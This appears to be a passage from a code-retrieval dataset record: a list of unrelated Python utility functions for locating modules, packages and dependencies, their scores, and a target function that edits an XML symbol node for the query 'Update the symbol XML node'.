prefix = \"github.com/DataDog/datadog-agent/\"\n base_path = os.getcwd()\n mod_parser_path = os.path.join(base_path, \"internal\", \"tools\", \"modparser\")\n\n if not os.path.isdir(mod_parser_path):\n raise Exception(f\"Cannot find go.mod parser in {mod_parser_path}\")\n\n try:\n output = subprocess.check_output(\n [\"go\", \"run\", \".\", \"-path\", os.path.join(base_path, self.path), \"-prefix\", prefix],\n cwd=mod_parser_path,\n ).decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n print(f\"Error while calling go.mod parser: {e.output}\")\n raise e\n\n # Remove github.com/DataDog/datadog-agent/ from each line\n return [line[len(prefix) :] for line in output.strip().splitlines()]", "def find_ext_modules(self):\n return (\n _create_extensions(self.package_name, self.ext_module_dirs)\n if self.ext_module_dirs\n else self._find_ext_modules_from_hint()\n if self.ext_module_hint\n else None\n )", "def get_leaf_modules(package_path):\n assert os.path.isfile(os.path.join(package_path, '__init__.py'))\n res = []\n root = os.path.join(package_path, '..')\n for path, _, files in os.walk(package_path):\n for f in files:\n if f.endswith(\".py\") and not f == \"__init__.py\":\n full_file = os.path.relpath(os.path.join(path, f), start=root)\n module = full_file.replace(os.sep, \".\")[:-3]\n res.append(module)\n return res", "def getOMFSrcModuleFiles(self) -> List[ghidra.app.util.bin.format.pe.debug.OMFSrcModuleFile]:\n ...", "def dependencies(project_name):\n deps = []\n logging.info('Locating {}'.format(project_name))\n located = distlib.locators.locate(project_name, prereleases=True)\n if located is None:\n logging.warn('{} not found'.format(project_name))\n return []\n for dep in located.run_requires:\n # Drop any version details from the dependency name.\n deps.append(just_name(dep))\n return deps", "def list_modules(lookup_paths: list = None):\n result = []\n\n if lookup_paths is None:\n lookup_paths = analyzer_paths()\n\n for path in lookup_paths:\n analyzer_module_root = resource_filename(path, \"modules\")\n # analyzer_root = os.path.join(anchore_module_root, \"modules\")\n for f in os.listdir(analyzer_module_root):\n thecmd = os.path.join(analyzer_module_root, f)\n if re.match(r\".*\\.py$\", thecmd):\n result.append(thecmd)\n\n result.sort(key=lambda x: analyzer_name_from_path(x))\n return result", "def _get_sourceFolders(self, dom):\n return self._get_new_module_root_manager(dom).getElementsByTagName('sourceFolder')", "def _include_dir_list_yaml(\n loader: SafeLineLoader, node: yaml.nodes.Node\n) -> List[JSON_TYPE]:\n loc = os.path.join(os.path.dirname(loader.name), node.value)\n return [load_yaml(f) for f in _find_files(loc, \"*.yaml\")]", "def resolve_deps(modules, dep_map):\n\n\tall_modules = []\n\tfor mod in modules:\n\t\tmodule_deps = dep_map[ get_kmodule(mod, dep_map) ]\n\n\t\tfor dep in module_deps:\n\t\t\tif dep not in all_modules:\n\t\t\t\tall_modules.append(dep)\n\t\n\treturn all_modules", "def linking_library_dirs(self):", "def iter_extension_paths():\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))", "def plugin_get_dependency():\n return []", "def get_fsleyes_deps():\n\n # The dependency list is stored in requirements.txt\n with open(op.join(basedir, 'requirements.txt'), 'rt') as f:\n install_requires = f.readlines()\n\n return [i.strip() for i in install_requires]", "def getRootModules():\n modules = []\n if ip.db.has_key('rootmodules'):\n return ip.db['rootmodules']\n t = time()\n store = False\n for path in sys.path:\n modules += moduleList(path) \n if time() - t >= TIMEOUT_STORAGE and not store:\n store = True\n print \"\\nCaching the list of root modules, please wait!\" \n print \"(This will only be done once - type '%rehashx' to \" + \\\n \"reset cache!)\"\n print\n if time() - t > TIMEOUT_GIVEUP:\n print \"This is taking too long, we give up.\"\n print\n ip.db['rootmodules'] = []\n return []\n \n modules += sys.builtin_module_names\n \n modules = list(set(modules))\n if '__init__' in modules:\n modules.remove('__init__')\n modules = list(set(modules))\n if store:\n ip.db['rootmodules'] = modules\n return modules", "def _find_files(root_dir, should_include):\n paths = [] # Return value.\n\n is_module = lambda path: path.endswith(\".py\")\n\n # os.walk() is new in Python 2.3\n # http://docs.python.org/library/os.html#os.walk\n for dir_path, dir_names, file_names in os.walk(root_dir):\n new_paths = [os.path.join(dir_path, file_name) for file_name in file_names]\n new_paths = filter(is_module, new_paths)\n new_paths = filter(should_include, new_paths)\n paths.extend(new_paths)\n\n return paths", "def module_yamls(self):\n # app.yaml first (correspond to 'default' module), then everything else.\n yamls = self._modules.copy()\n return [yamls.pop('default').path] + [m.path for m in yamls.itervalues()]", "def get_installed_modules(dir, repo_type=\"modules\"):\n # initialize lists\n local_modules = []\n nfcore_modules = []\n local_modules_dir = None\n nfcore_modules_dir = os.path.join(dir, \"modules\", \"nf-core\")\n\n # Get local modules\n if repo_type == \"pipeline\":\n local_modules_dir = os.path.join(dir, \"modules\", \"local\")\n\n # Filter local modules\n if os.path.exists(local_modules_dir):\n local_modules = os.listdir(local_modules_dir)\n local_modules = sorted([x for x in local_modules if x.endswith(\".nf\")])\n\n # Get nf-core modules\n if os.path.exists(nfcore_modules_dir):\n for m in sorted([m for m in os.listdir(nfcore_modules_dir) if not m == \"lib\"]):\n if not os.path.isdir(os.path.join(nfcore_modules_dir, m)):\n raise ModuleException(\n f\"File found in '{nfcore_modules_dir}': '{m}'! This directory should only contain module directories.\"\n )\n m_content = os.listdir(os.path.join(nfcore_modules_dir, m))\n # Not a module, but contains sub-modules\n if not \"main.nf\" in m_content:\n for tool in m_content:\n nfcore_modules.append(os.path.join(m, tool))\n else:\n nfcore_modules.append(m)\n\n # Make full (relative) file paths and create NFCoreModule objects\n local_modules = [os.path.join(local_modules_dir, m) for m in local_modules]\n nfcore_modules = [\n NFCoreModule(m, \"nf-core/modules\", Path(nfcore_modules_dir, m), repo_type=repo_type, base_dir=Path(dir))\n for m in nfcore_modules\n ]\n\n return local_modules, nfcore_modules", "def _get_libs_from_tree(charm_name=None):\n local_libs_data = []\n\n if charm_name is None:\n base_dir = pathlib.Path(\"lib\") / \"charms\"\n charm_dirs = sorted(base_dir.iterdir()) if base_dir.is_dir() else []\n else:\n importable_charm_name = create_importable_name(charm_name)\n base_dir = pathlib.Path(\"lib\") / \"charms\" / importable_charm_name\n charm_dirs = [base_dir] if base_dir.is_dir() else []\n\n for charm_dir in charm_dirs:\n for v_dir in sorted(charm_dir.iterdir()):\n if v_dir.is_dir() and v_dir.name[0] == \"v\" and v_dir.name[1:].isdigit():\n for libfile in sorted(v_dir.glob(\"*.py\")):\n local_libs_data.append(_get_lib_info(lib_path=libfile))\n\n found_libs = [lib_data.full_name for lib_data in local_libs_data]\n logger.debug(\"Libraries found under %r: %s\", str(base_dir), found_libs)\n return local_libs_data", "def get_log_paths(root_dir: str) -> List[str]:\n paths = []\n if not tf.io.gfile.isdir(root_dir):\n raise ValueError(f'{root_dir} is not a directory.')\n for path, _, files in tf.io.gfile.walk(root_dir):\n if 'metadata.riegeli' in files:\n paths.append(path)\n return paths", "def get_fortran_deps(self, compiler: FortranCompiler, src: Path, target) -> T.List[str]:\n if self.use_dyndeps_for_fortran():\n return []\n\n dirname = Path(self.get_target_private_dir(target))\n tdeps = self.fortran_deps[target.get_basename()]\n srcdir = Path(self.source_dir)\n\n mod_files = _scan_fortran_file_deps(src, srcdir, dirname, tdeps, compiler)\n return mod_files", "def find_dcds(src):\n\n dcd_paths = []\n\n for root, dirs, files in os.walk(src):\n for filename in files:\n if filename.endswith(\".dcd\"):\n dcd_paths.append(os.path.join(root, filename))\n\n return dcd_paths", "def _find_module_path(self, fullname, module_name, search_dirs):\n self.msgin(4, \"_find_module_path <-\", fullname, search_dirs)\n\n # Top-level 2-tuple to be returned.\n path_data = None\n\n # List of the absolute paths of all directories comprising the\n # namespace package to which this module belongs if any.\n namespace_dirs = []\n\n try:\n for search_dir in search_dirs:\n # PEP 302-compliant importer making loaders for this directory.\n importer = pkgutil.get_importer(search_dir)\n\n # If this directory is not importable, continue.\n if importer is None:\n # self.msg(4, \"_find_module_path importer not found\", search_dir)\n continue\n\n # Get the PEP 302-compliant loader object loading this module.\n #\n # If this importer defines the PEP 302-compliant find_loader()\n # method, prefer that.\n if hasattr(importer, 'find_loader'):\n loader, loader_namespace_dirs = importer.find_loader(\n module_name)\n namespace_dirs.extend(loader_namespace_dirs)\n # Else if this importer defines the Python 2-specific\n # find_module() method, fall back to that. Despite the method\n # name, this method returns a loader rather than a module.\n elif hasattr(importer, 'find_module'):\n loader = importer.find_module(module_name)\n # Else, raise an exception.\n else:\n raise ImportError(\n \"Module %r importer %r loader unobtainable\" % (module_name, importer))\n\n # If this module is not loadable from this directory, continue.\n if loader is None:\n # self.msg(4, \"_find_module_path loader not found\", search_dir)\n continue\n\n # Absolute path of this module. If this module resides in a\n # compressed archive, this is the absolute path of this module\n # after extracting this module from that archive and hence\n # should not exist; else, this path should typically exist.\n pathname = None\n\n # If this loader defines the PEP 302-compliant get_filename()\n # method, preferably call that method first. Most if not all\n # loaders (including zipimporter objects) define this method.\n if hasattr(loader, 'get_filename'):\n pathname = loader.get_filename(module_name)\n # Else if this loader provides a \"path\" attribute, defer to that.\n elif hasattr(loader, 'path'):\n pathname = loader.path\n # Else, raise an exception.\n else:\n raise ImportError(\n \"Module %r loader %r path unobtainable\" % (module_name, loader))\n\n # If no path was found, this is probably a namespace package. In\n # such case, continue collecting namespace directories.\n if pathname is None:\n self.msg(4, \"_find_module_path path not found\", pathname)\n continue\n\n # Return such metadata.\n path_data = (pathname, loader)\n break\n # Else if this is a namespace package, return such metadata.\n else:\n if namespace_dirs:\n path_data = (namespace_dirs[0],\n NAMESPACE_PACKAGE(namespace_dirs))\n except UnicodeDecodeError as exc:\n self.msgout(1, \"_find_module_path -> unicode error\", exc)\n # Ensure that exceptions are logged, as this function is typically\n # called by the import_module() method which squelches ImportErrors.\n except Exception as exc:\n self.msgout(4, \"_find_module_path -> exception\", exc)\n raise\n\n # If this module was not found, raise an exception.\n self.msgout(4, \"_find_module_path ->\", path_data)\n if path_data is None:\n raise ImportError(\"No module named \" + repr(module_name))\n\n return path_data", "def list_dir(self, path):", "def _find_all_importables(pkg: ModuleType) -> List[str]:\n return sorted(\n set(\n chain.from_iterable(\n _discover_path_importables(Path(p), pkg.__name__)\n # FIXME: Unignore after upgrading to `mypy > 0.910`. The fix\n # FIXME: is in the `master` branch of upstream since Aug 4,\n # FIXME: 2021 but has not yet been included in any releases.\n # Refs:\n # * https://github.com/python/mypy/issues/1422\n # * https://github.com/python/mypy/pull/9454\n for p in pkg.__path__ # type: ignore[attr-defined]\n ),\n ),\n )", "def get_drivers(dirpath):\n\n return all_drivers", "def get_required_module_descriptors(self):\r\n return []", "def _iter_module_files():\n # The list call is necessary on Python 3 in case the module\n # dictionary modifies during iteration.\n for module in list(sys.modules.values()):\n if module is None:\n continue\n filename = getattr(module, \"__file__\", None)\n if filename:\n old = None\n while not os.path.isfile(filename):\n old = filename\n filename = os.path.dirname(filename)\n if filename == old:\n break\n else:\n if filename[-4:] in (\".pyc\", \".pyo\"):\n filename = filename[:-1]\n yield filename", "def modules_in_current_dir(path, module_name):\n yield from modules_from_path(Path(path).parent, module_name)", "def get_rpath_deps(pkg):\n if pkg.transitive_rpaths:\n return [d for d in pkg.spec.traverse(root=False, deptype=(\"link\"))]\n else:\n return pkg.spec.dependencies(deptype=\"link\")", "def _list_all(root_pkg, prog):\n res = \"\\n\".join(\n sorted(\n pkinspect.package_module_names(_import(root_pkg)),\n key=str.lower,\n ),\n )\n sys.stderr.write(f\"usage: {prog} module command [args...]\\nModules:\\n{res}\\n\")\n return 1", "def syspaths(self):\n res = []\n for path, jsmodule in self.jsmodules.items():\n if jsmodule.js_lib_path != \"\":\n js_lib_path = os.path.dirname(jsmodule.js_lib_path.rstrip(\"/\")) # get parent\n if not js_lib_path in res:\n res.append(js_lib_path)\n return res", "def _discover_path_importables(\n pkg_pth: Path, pkg_name: str,\n) -> Generator[str, None, None]:\n for dir_path, _d, file_names in os.walk(pkg_pth):\n pkg_dir_path = Path(dir_path)\n\n if pkg_dir_path.parts[-1] == '__pycache__':\n continue\n\n if all(Path(_).suffix != '.py' for _ in file_names):\n continue\n\n rel_pt = pkg_dir_path.relative_to(pkg_pth)\n pkg_pref = '.'.join((pkg_name,) + rel_pt.parts)\n yield from (\n pkg_path\n for _, pkg_path, _ in pkgutil.walk_packages(\n (str(pkg_dir_path),), prefix=f'{pkg_pref}.',\n )\n )", "def get_all_setups_roots():\n ta_roots = cmds.ls(\"*.{}\".format(CONFIG[\"config_attr\"]), r=True, o=True)\n return ta_roots", "def get_directories():\n # get current working dir\n directory = os.getcwd()\n # list of dir to look in repo for files\n directories = [\n directory,\n os.path.expanduser(os.path.join(directory, 'src')),\n os.path.expanduser(os.path.join(directory, 'tests'))\n ]\n return directories", "def findModule(name):", "def get_required_module_descriptors(self):\r\n descriptors = []\r\n for location in self.sources_list:\r\n try:\r\n descriptor = self.system.load_item(location)\r\n descriptors.append(descriptor)\r\n except ItemNotFoundError:\r\n msg = \"Invalid module by location.\"\r\n log.exception(msg)\r\n self.system.error_tracker(msg)\r\n\r\n return descriptors", "def mod_list(dir):\n\n modList = []\n modHash = {}\n isModule = False\n for ii in os.walk(dir):\n if ii[0] == dir:\n for f in ii[2]:\n # If there is no __init__ file, then the directory\n # upon which mod_list() is operating is not a module\n if f[0:8] == '__init__':\n isModule = True\n elif f[-3:] == '.py':\n modHash[f[:-3]] = True\n elif f[-4:] == '.pyc' or f[-4:] == '.pyo':\n modHash[f[:-4]] = True\n if isModule:\n modList = modHash.keys()\n modList.sort()\n return(modList)\n else:\n # Returning an empty list allows 'in' tests since a list is iterable,\n # and None isn't\n return([])", "def loadEtcDir(options, tags):\n etcdir = os.path.join(options.cdir, 'etc')\n # to import modules from the etc dir\n sys.path.append(etcdir)\n modules = {}\n for name in listConfigModules(etcdir):\n path = os.path.join(etcdir, name)\n module = loadConfigModule(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n return modules", "def get_third_party_package_module_names():\n # type: () -> List[str]\n result = [] # type: List[str]\n\n def is_python_package(directory_path, file_path):\n # type: (str, str) -> Tuple[bool, Optional[str]]\n \"\"\"\n Return package name if the provided file path is a Python package, None otherwise.\n \"\"\"\n file_name = os.path.basename(file_path)\n init_file_path = os.path.join(file_path, \"__init__.py\")\n\n if os.path.isdir(file_path) and os.path.isfile(init_file_path):\n # Package\n return (True, file_name)\n\n return (False, None)\n\n def is_python_module(directory_path, file_path):\n # type: (str, str) -> Tuple[bool, Optional[str]]\n \"\"\"\n Return module name if the provided file path is a Python module, None otherwise.\n \"\"\"\n if (\n os.path.isfile(file_path)\n and file_path.endswith(\".py\")\n and file_name != \"__init__.py\"\n ):\n # Single file module (e.g. six.py)\n module_name = file_name.replace(\".py\", \"\")\n return (True, module_name)\n\n return (False, None)\n\n for directory_path in THIRD_PARTY_DIRECTORIES:\n file_names = os.listdir(directory_path)\n\n for file_name in file_names:\n file_path = os.path.join(directory_path, file_name)\n\n python_package, package_name = is_python_package(directory_path, file_path)\n python_module, module_name = is_python_module(directory_path, file_path)\n\n if python_package and package_name:\n result.append(package_name)\n elif python_module and module_name:\n result.append(module_name)\n\n return result", "def __dir__(self) -> List[str]:\n self._try_setup()\n return object.__dir__(self) # pytype: disable=attribute-error", "def find_packages( root ):\n for path, directories, files in os.walk( root ):\n if is_package( path ):\n yield path.replace( '/','.' )", "def selected_lib_roots(args: Namespace) -> List[str]:\n return [LIB_ROOTS[lib] for lib in selected_libs(args)]", "def checkForDependencies(self):\n\n # This method will check our module for any attached modules\n modules = self.getAllModules\n joints = self.returnCreatedJoints\n\n attachedMods = []\n instances = {}\n\n for inst in self.rigUiInst.moduleInstances:\n networkNode = inst.returnNetworkNode\n instances[networkNode] = inst\n\n for module in modules:\n parentJoint = cmds.getAttr(module + \".parentModuleBone\")\n moduleName = cmds.getAttr(module + \".moduleName\")\n if parentJoint in joints:\n instance = instances.get(module)\n attachedMods.append([module, parentJoint, moduleName, instance])\n\n return attachedMods", "def _list_modules():\r\n return [\r\n desc.module_class\r\n for desc\r\n in _list_descriptors()\r\n ]", "def walk_modules(path):\n\n mods = []\n mod = import_module(path)\n mods.append(mod)\n if hasattr(mod, '__path__'):\n for _, subpath, ispkg in iter_modules(mod.__path__):\n fullpath = path + '.' + subpath\n if ispkg:\n mods += walk_modules(fullpath)\n else:\n submod = import_module(fullpath)\n mods.append(submod)\n return mods", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def scan_morepath_modules(cls: type[morepath.App]) -> None:\n for module in sorted(morepath_modules(cls)):\n morepath.scan(import_module(module))", "def _find_module_files(rootDir: str, simpleFilenames: List[str])\\\n -> Set[str]:\n\n moduleFiles = set()\n\n for root, dirs, _ in os.walk(rootDir):\n for dirObj in dirs:\n dir = str(dirObj)\n if not dir.startswith(MODULE_DIR_PREFIX):\n continue\n\n dirPath = join(root, dir)\n moduleFile = _any_file_exists(dirPath, simpleFilenames)\n if moduleFile:\n moduleFiles.add(moduleFile)\n\n return moduleFiles", "def get_all_modules(package):\n base = Path(inspect.getabsfile(package)).parent\n\n for fl in base.glob(\"*.py\"):\n print(f\"loading module {fl}\")\n yield load_module(fl)", "def get_required_module_descriptors(self):\r\n\r\n # If use_for_single_location is True, this is linked to an open ended problem.\r\n if self.use_for_single_location:\r\n # Try to load the linked module.\r\n # If we can't load it, return empty list to avoid exceptions on progress page.\r\n try:\r\n linked_module = self.system.load_item(self.link_to_location)\r\n return [linked_module]\r\n except (NoPathToItem, ItemNotFoundError):\r\n error_message = (\"Cannot find the combined open ended module \"\r\n \"at location {0} being linked to from peer \"\r\n \"grading module {1}\").format(self.link_to_location, self.location)\r\n log.error(error_message)\r\n return []\r\n else:\r\n return []", "def find(self):\n extension_hooks = list()\n eggs = find_eggs(self.rootDir)\n factory = EggPMExtensionFactory()\n for egg in eggs:\n # Add egg to path so other parts of pylabs can import its contents\n eggfile = egg.location\n sys.path.append(eggfile)\n for filePointer, path in self._generateExtensionConfigFilePointers(eggfile):\n inifile = pylabs.inifile.IniFile(filePointer)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_config_dirs(project=None, prog=None, extension='.conf.d'):\n return _find_config_files(project, prog, extension)", "def get_candidate_paths():\n yield get_linked_libpython()\n\n # List candidates for directories in which libpython may exist\n config_vars = \"LIBPL\", \"srcdir\", \"LIBDIR\"\n lib_dirs = list(map(sysconfig.get_config_var, config_vars))\n\n if is_windows():\n lib_dirs.append(os.path.join(os.path.dirname(sys.executable)))\n else:\n lib_dirs.append(os.path.join(\n os.path.dirname(os.path.dirname(sys.executable)),\n \"lib\"))\n\n # For macOS:\n lib_dirs.append(sysconfig.get_config_var(\"PYTHONFRAMEWORKPREFIX\"))\n\n lib_dirs.append(sys.exec_prefix)\n lib_dirs.append(os.path.join(sys.exec_prefix, \"lib\"))\n\n lib_basenames = list(get_candidate_names())\n\n for directory in filter(bool, lib_dirs):\n for basename in lib_basenames:\n yield os.path.join(directory, basename)\n\n # In macOS and Windows, ctypes.util.find_library returns a full path:\n for basename in lib_basenames:\n yield ctypes.util.find_library(get_library_name(basename))", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def _get_external_libraries(self, dom, type='CLASSES'):\n module = dom.getElementsByTagName('module')[0]\n components = module.getElementsByTagName('component')\n for component in components:\n if component.getAttribute('name') == 'NewModuleRootManager':\n for orderEntry in component.getElementsByTagName('orderEntry'):\n for library in orderEntry.getElementsByTagName('library'):\n if library.getAttribute('name') == 'external':\n for library_type in library.getElementsByTagName(type):\n return library_type.getElementsByTagName('root')\n return None", "def modules(self):\n return self._modules.keys()", "def get_deps_path(root):\n app_root = os.path.join(root, DEPS_PATTERN)\n files = glob.glob(app_root)\n if len(files) != 1:\n return None\n return files[0]", "def get_provider_yaml_paths():\n return sorted(glob(f\"{ROOT_DIR}/airflow/providers/**/provider.yaml\", recursive=True))", "def get_LCtodo(loc=BASE):\n toproc = []\n for ff in Path(loc).glob(\"**/*.d/import*.mscf\"):\n if (ff.parent/'ser').exists():\n toproc.append(ff)\n if DEBUG: \n print('get_LCtodo')\n pprint([str(i.parent.name) for i in toproc])\n return toproc", "def _get_compile_cache_dep_files():\n if entry_script_path is None:\n logger.warning(\"Can not get the entry script file path.\")\n return []\n compile_cache_dep_files = []\n logger.debug(f\"entry script file path: {entry_script_path}\")\n compile_cache_dep_files.append(entry_script_path)\n __get_compile_cache_dep_files(entry_script_path, compile_cache_dep_files, None)\n return compile_cache_dep_files", "def get_tests():\n\tret = []\n\tfor walk_tuple in os.walk(webnotes.defs.modules_path):\n\t\tfor test_file in filter(lambda x: x.startswith('test') and x.endswith('.py'), walk_tuple[2]):\n\t\t\tdir_path = os.path.relpath(walk_tuple[0], webnotes.defs.modules_path)\n\t\t\tif dir_path=='.':\n\t\t\t\tret.append(test_file[:-3])\n\t\t\telse:\n\t\t\t\tret.append(dir_path.replace('/', '.') + '.' + test_file[:-3])\t\t\t\n\treturn ret", "def find_kem_dirs(basename):\n # TODO: assume script run from project root\n upstream_dir = 'src/kem/{}/upstream'\n kem_dirs = []\n\n # TODO; find api.h files to enable generation of wrapper code\n for dirpath, _, filenames in os.walk(upstream_dir.format(basename)):\n if 'api.h' in filenames:\n kem_dirs.append(dirpath)\n\n if not kem_dirs:\n msg = 'api.h not found in subdirs of {}'.format(upstream_dir)\n raise oqs.KemException(msg)\n\n return kem_dirs", "def get_dependencies_content():\n import trustedanalytics\n dependencies = []\n for filename in trustedanalytics.udf_dependencies:\n name, content = _get_file_content_as_str(filename)\n dependencies.append({'file_name': name, 'file_content': content})\n return dependencies", "def get_all_test_modules():\n test_modules = []\n current_directory = os.path.dirname(__file__)\n sys.path.insert(0, os.path.join(current_directory, '..'))\n files = sorted(os.listdir(current_directory))\n for file in files:\n if file.startswith('test') and file.endswith('.py'):\n test_modules.append(file.rstrip('.py'))\n\n return test_modules", "def get_dependencies(self):\n dependencies = self._dependencies\n if self.ansible is not None:\n dependencies.append(\"ansible=={}.*\".format(self.ansible))\n else:\n dependencies.append(\"ansible\")\n # Drivers can have their own dependencies\n if self.scenario.driver is not None \\\n and self.scenario.driver in DRIVER_DEPENDENCIES.keys():\n dependencies.extend(DRIVER_DEPENDENCIES[self.scenario.driver])\n # Scenarios can specify a requirements.txt\n if self.scenario.requirements is not None:\n dependencies.append(\"-r\" + self.scenario.requirements)\n return dependencies", "def get_cl_include():\n\n PYSPH_ROOT = get_pysph_root()\n\n inc_dir = ['-I'+path.join(PYSPH_ROOT, 'base'),\n '-I'+path.join(PYSPH_ROOT, 'solver'), ]\n\n return inc_dir" ]
[ "0.65620816", "0.63926107", "0.6388437", "0.63874215", "0.6298563", "0.6170511", "0.6139222", "0.6134263", "0.6119241", "0.61146545", "0.608592", "0.6056361", "0.603119", "0.6020695", "0.5978215", "0.5966075", "0.5961092", "0.5923319", "0.5875171", "0.5873686", "0.58671385", "0.5861534", "0.585865", "0.5849939", "0.58458", "0.58162546", "0.5793757", "0.5763414", "0.57381886", "0.57321966", "0.5730651", "0.5726441", "0.56796294", "0.56707853", "0.5630973", "0.55979466", "0.5584999", "0.55588514", "0.55581486", "0.55458415", "0.55433863", "0.5540886", "0.5537447", "0.5527226", "0.55236125", "0.5522153", "0.5517422", "0.55063343", "0.5500828", "0.548126", "0.54809475", "0.54718846", "0.546732", "0.546724", "0.545434", "0.54529965", "0.54517764", "0.5446728", "0.54447585", "0.5436942", "0.5430284", "0.5417143", "0.54136235", "0.5394653", "0.5394266", "0.5391366", "0.5382649", "0.5380439", "0.5377442", "0.537491", "0.53731126", "0.5372933", "0.5366835", "0.5354331", "0.53535616", "0.5349552", "0.5343215", "0.5339933", "0.53374213", "0.5336671", "0.5335013", "0.5332925", "0.5330616", "0.53304255", "0.5324295", "0.5323345", "0.531754", "0.531754", "0.5309154", "0.53038186", "0.530372", "0.5292045", "0.5289764", "0.52836525", "0.5279171", "0.5278824", "0.5277094", "0.5269079", "0.52675396", "0.5266085" ]
0.76784027
0
Update the symbol XML node
def edit_symbol_node(node, filename): size = int(re.findall('\d+', filename)[-1]) log.info('New filename %s; size %s', filename, size) node.set('typeId', SYMBOL_ID) node.find('name').text = 'DLS symbol' # Use PV name from rule in control PV for tooltip etc. # Reference that PV in rule to avoid duplication. pv_name = node.find('.//pv').text pv_element = et.Element('pv_name') pv_element.text = pv_name node.append(pv_element) node.find('.//pv').text = '$(pv_name)' rule_element = node.find('.//rule') rule_element.set('prop_id', 'image_index') rule_element.set('out_exp', 'true') file_element = et.Element('image_file') file_element.text = filename num_element = et.Element('symbol_number') num_element.text = '0' img_size_element = et.Element('sub_image_width') img_size_element.text = str(size) node.append(file_element) node.append(num_element) node.append(img_size_element) node.remove(node.find('opi_file'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_symbol(self, symbol):\r\n self.symbol = symbol", "def symbol(self, symbol):\n self._symbol = symbol", "def symbol(self, symbol):\n\n self._symbol = symbol", "def set_symbol(self, row, col, symbol):\n self.field[row, col] = symbol", "def setSymbolProps(self, name, symbol):\r\n self.symbolProps = autosar.base.SymbolProps( str(name), str(symbol))", "def setElementsCoordinates(self, symbol, x, y):\n #If it is the start element\n if symbol == \"D\":\n self._set_start((x,y))\n\n #If it is the end of the level element\n elif symbol == \"F\":\n self._set_end((x,y))\n\n #If it is a spike\n elif symbol == \"S\":\n self._get_spikes().append((x,y))\n \n #If it is a scroll\n elif symbol == \"P\":\n self._get_scrolls().append((x,y))\n\n #If it is a key\n elif symbol == \"K\":\n self._get_keys().append((x,y))", "def create_simple_symbol(xml_document, symbols_element, properties, count, alpha, tags=None):\n symbol_element = xml_document.createElement(\"symbol\")\n symbol_element.setAttribute(\"alpha\", alpha)\n symbol_element.setAttribute(\"clip_to_extent\", \"1\")\n symbol_element.setAttribute(\"type\", properties['symbol_type'])\n symbol_element.setAttribute(\"name\", unicode(count))\n if tags and len(tags) > 0:\n symbol_element.setAttribute(\"tags\", tags)\n symbols_element.appendChild(symbol_element)\n\n for layer in reversed(properties['layer']):\n renderer_layer_element = xml_document.createElement(\"layer\")\n renderer_layer_element.setAttribute(\"pass\", \"0\")\n renderer_layer_element.setAttribute(\"enabled\", \"1\")\n renderer_layer_element.setAttribute(\"locked\", \"0\")\n renderer_layer_element.setAttribute(\"class\", layer['simpleSymbolClass'])\n symbol_element.appendChild(renderer_layer_element)\n\n for key, value in layer['dict_symbols'].items():\n\n symbol_properties_element = xml_document.createElement(\"prop\")\n symbol_properties_element.setAttribute(\"k\", unicode(key))\n symbol_properties_element.setAttribute(\"v\", unicode(value))\n renderer_layer_element.appendChild(symbol_properties_element)\n\n data_defined_properties_element = xml_document.createElement(\"data_defined_properties\")\n renderer_layer_element.appendChild(data_defined_properties_element)\n\n data_defined_option_element = xml_document.createElement(\"Option\")\n data_defined_option_element.setAttribute(\"type\", \"Map\")\n data_defined_properties_element.appendChild(data_defined_option_element)\n\n data_defined_option_value_element = xml_document.createElement(\"Option\")\n data_defined_option_value_element.setAttribute(\"value\", \"\")\n data_defined_option_value_element.setAttribute(\"type\", \"QString\")\n data_defined_option_value_element.setAttribute(\"name\", \"name\")\n data_defined_option_element.appendChild(data_defined_option_value_element)\n\n data_defined_option_name_element = xml_document.createElement(\"Option\")\n data_defined_option_name_element.setAttribute(\"name\", \"properties\")\n data_defined_option_element.appendChild(data_defined_option_name_element)\n\n data_defined_option_collection_element = xml_document.createElement(\"Option\")\n data_defined_option_collection_element.setAttribute(\"value\", \"collection\")\n data_defined_option_collection_element.setAttribute(\"type\", \"QString\")\n data_defined_option_collection_element.setAttribute(\"name\", \"type\")\n data_defined_option_element.appendChild(data_defined_option_collection_element)\n\n if 'subSymbol' in layer:\n SimpleSymbol.create_simple_symbol(xml_document, renderer_layer_element, layer['subSymbol'], \"@0@0\", '1')", "def add_symbol(self, symbol_name: str, attrs: dict = None):\n if attrs is None:\n attrs = {}\n self.current_level().add_symbol(symbol_name, attrs)\n # print(f'After add {symbol_name}, symbol_table is:\\n{self}')", "def updateGraph(self, symbol=None):\n if symbol is None:\n return\n\n # Get all stock data back for the given symbol\n self.stock_data = self.db.queryAllData(table_name=symbol)\n\n # Create a list of prices and a list of dates\n self.prices = [x[1].strip('$') for x in self.stock_data]\n self.dates = [x[0] for x in self.stock_data]\n date_string = [x.strftime(\"%m/%d/%Y\") for x in self.dates]\n self.x = [datetime.datetime.strptime(d, '%m/%d/%Y').date()\n for d in date_string]\n\n # Create an instance of QtMpl\n self.mpl = self.central.mpl\n self.mpl.addLine(x=self.x, y=self.prices, title=symbol)", "def symbol_id(self, value: str):\n self._symbol = value", "def put(self, name_symbol=None, name=None, symbol=None):\n putted_symbl = super(ElemModule.ModuleSymTab, self).put(name_symbol=name_symbol, name=name, symbol=symbol)\n if isinstance(putted_symbl, ElemPort):\n self.module.add_io_decl(putted_symbl)", "def _set_symbol(self, symbol, blank=False):\n self._symbols.add(symbol)\n\n try:\n assert self._blank_symbol == None or not blank\n if blank:\n self._blank_symbol = symbol\n except:\n raise Exception(\n f\"Machine got blank symbol '{symbol}' which is already set to '{self._blank_symbol}'\"\n )", "def __setitem__(self, name, symbol):\n self.current_scope[name] = symbol", "def updateOffset(self):\n raise Exception(\"Unimplemented function in symbol: \"+self.name)", "def put_symbol(self, symbol, row, column):\n\n self.board[row][column] = symbol", 